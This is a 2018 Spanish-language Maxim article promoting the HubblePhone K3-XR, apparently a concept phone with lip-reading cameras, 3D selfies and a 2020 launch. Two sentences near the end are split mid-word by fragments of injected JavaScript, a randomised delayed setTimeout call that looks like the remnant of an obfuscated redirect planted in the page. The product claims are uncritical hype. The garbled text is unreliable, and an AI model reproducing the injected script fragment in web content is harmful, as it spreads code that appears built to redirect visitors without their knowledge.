Smartphone ultra-futurista toma selfies 3D y lee los labios

    Smartphone ultra-futurista toma selfies 3D y lee los labios

    La siguiente década de teléfonos empieza aquí.

    Autor: Redacción Maxim 15 agosto, 2018


    FOTO: HubblePhone

    El teléfono inteligente se volvió mucho más inteligente.

     


    Considerado como «el primer centro de entretenimiento móvil del mundo», el HubblePhone K3-XR de Turing Space Industries hace que casi todos los dispositivos celulares parezcan totalmente obsoletos.

    Las características más evidentes son sus múltiples pantallas de 12″ y cámaras ópticas 15X, que literalmente pueden leer los labios de los usuarios para hacer llamadas o enviar mensajes de texto.

     

    FOTO: HubblePhone

     

    Una aplicación de mensajería de alta tecnología también puede escanear y entregar fotos de objetos 3D que se proyectan en el entorno físico de los destinatarios (no preguntes cómo). Finalmente puedes compartir una selfie multidimensional que muestra todos tus mejores ángulos.

    El HubblePhone también cuenta con una plataforma sin precedentes para juegos móviles con tecnologías AR, VR MR, XR y «Realidad Artificial» integradas, así como una velocidad de datos 50 por ciento más rápida en comparación con las redes 4G actuales.

     


     

    Todas estas increíbles características están alojadas en un llamativo marco de aluminuro de titanio que puede girar en cualquier dirección sobre una bisagra de metal líquido y cerrarse como un teléfono plegable.

     

    Todo esto puede sonar como un sueño, pero el diseñador del teléfono inteligente, Paavo Pietola, ayudó a sacar al mercado el Nokia 2010 y el Ericsson T66, cada uno de los cuales eran dispositivos innovadores en su época.

    Desafortunadamente, tendrás que esperar dos años y ahorrar $ 2,750 dólares para comprar el HubblePhone cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando salga en 2020. Definitivamente valdrá la pena la espera.

    FOTO: HubblePhone

     

     

    FOTO: HubblePhone

     

    Hablandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando de actualidad y tecnología te dejamos los primeros rumores sobre el nuevo iPhone.

     

     

     

    Temas relacionados con esta nota: , , , , ,

La siguiente década de teléfonos empieza aquí.